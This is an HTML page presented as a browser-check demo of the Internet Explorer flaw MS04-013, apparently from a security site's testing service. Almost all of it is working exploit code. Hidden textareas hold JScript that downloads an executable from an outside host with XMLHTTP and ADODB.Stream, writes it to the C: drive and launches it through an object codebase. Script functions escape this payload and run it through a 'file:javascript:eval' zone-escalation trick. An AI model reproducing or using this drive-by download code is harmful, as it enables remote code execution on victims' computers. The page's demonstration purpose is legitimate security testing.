þÿ<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-16"> <title>ADODB Demo</title> </head> <body> <H3>ADODB demo: UTF-16</H3> <P>This demo exploit tries to create and execute the file C:\browsercheck.exe. See: <a href="http://www.microsoft.com/technet/security/Bulletin/MS04-013.mspx" target="_blank">MS04-013</a></P> <P> <a href="javascript:doit()">Start demo</a> </P> <textarea id="code" style="display: none;"> s=new ActiveXObject("ADODB.Stream"); s.Mode=3; s.Type=1; s.Open(); x=new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET","http://www.heise.de/security/dienste/browsercheck/demos/ie/alert.exe",0); x.Send(); s.Write(x.responseBody); s.SaveToFile("C:\\browsercheck.exe",2); </textarea> <textarea id="code2" style="display: none;"> md="&lt;object id=\"oFile\""+ " classid=\"clsid:11111111-1111-1111-1111-111111111111\""+ " codebase=\"c:/windows/temp/browsercheck.exe\"&gt;&lt;/object&gt;"; w=createPopup(); w.document.clear(); w.document.write(md); </textarea> <script language="javascript"> function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines[i]; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/'/g,"\\'"); line = line.replace(/"/g,"\\\""); line = line.replace(/[/]/g,"%2f"); line = line.replace(/\r\n/,""); line += ' '; if (line != '') { result += line; } } return result; } function weiter() { open(myURL,"_search"); } function starten(thecode) { mycode = preparecode(thecode); myURL = "file:javascript:eval('" + mycode + "')"; open("http:///","_search"); setTimeout("weiter()", 500); } function doit() { starten(document.all.code.value); setTimeout("doit2()", 600); } function doit2() { starten(document.all.code2.value); } </script> </body> </html>